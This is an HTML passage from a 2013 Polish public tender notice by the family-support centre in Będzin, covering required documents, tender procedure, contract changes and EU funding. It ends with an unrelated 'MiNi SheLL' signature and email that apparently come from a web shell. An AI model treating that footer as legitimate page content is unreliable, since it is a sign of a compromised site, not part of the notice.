<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy ubiegającego/cych się o udzielenie zamówienia publicznego. W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia, pełnomocnictwo takie może wynikać z dołączonej do oferty umowy konsorcjum lub umowy spółki cywilnej. Pełnomocnictwo należy dołączyć w oryginale lub kopii potwierdzonej za zgodność z oryginałem notarialnie.
2. Listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej - zgodnie z załącznikiem nr 6 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy,
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi poniżej:
1. Zmiana ośrodka rehabilitacyjnego zaproponowanego w ofercie na równoważny lub o lepszym standardzie może nastąpić w sytuacji, gdy:
a) w ośrodku wskazanym w Ofercie nastąpiły działania siły wyższej (tj. klęski żywiołowe, kataklizmy powodujące uszkodzenia budynku ośrodka) w pełni niezależnej od Stron umowy, mającej bezpośredni wpływ na termin wykonania usługi;
Pobyt w nowym ośrodku rehabilitacyjnym należy uzgodnić z Zamawiającym i uzyskać jego zgodę pisemną. Zmiana ośrodka rehabilitacyjnego  zostanie dokonana bez zmiany wynagrodzenia.
Zmiana ośrodka rehabilitacyjnego wymaga zawarcia aneksu do podpisanej umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pcpr1@o2.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
42-500 Będzin, ul. Krasickiego 17 (pokój 10 -11).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2013 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
42-500 Będzin, ul. Krasickiego 17 (pokój 9).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Inwestycja w człowieka środkiem do osiągnięcia efektów społecznych realizowany jest przez Powiatowe Centrum Pomocy Rodzinie w Będzinie na podstawie umowy nr:  UDA-POKL.07.01.02-24-001.08-00 i współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, Programu Operacyjnego Kapitał Ludzki 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com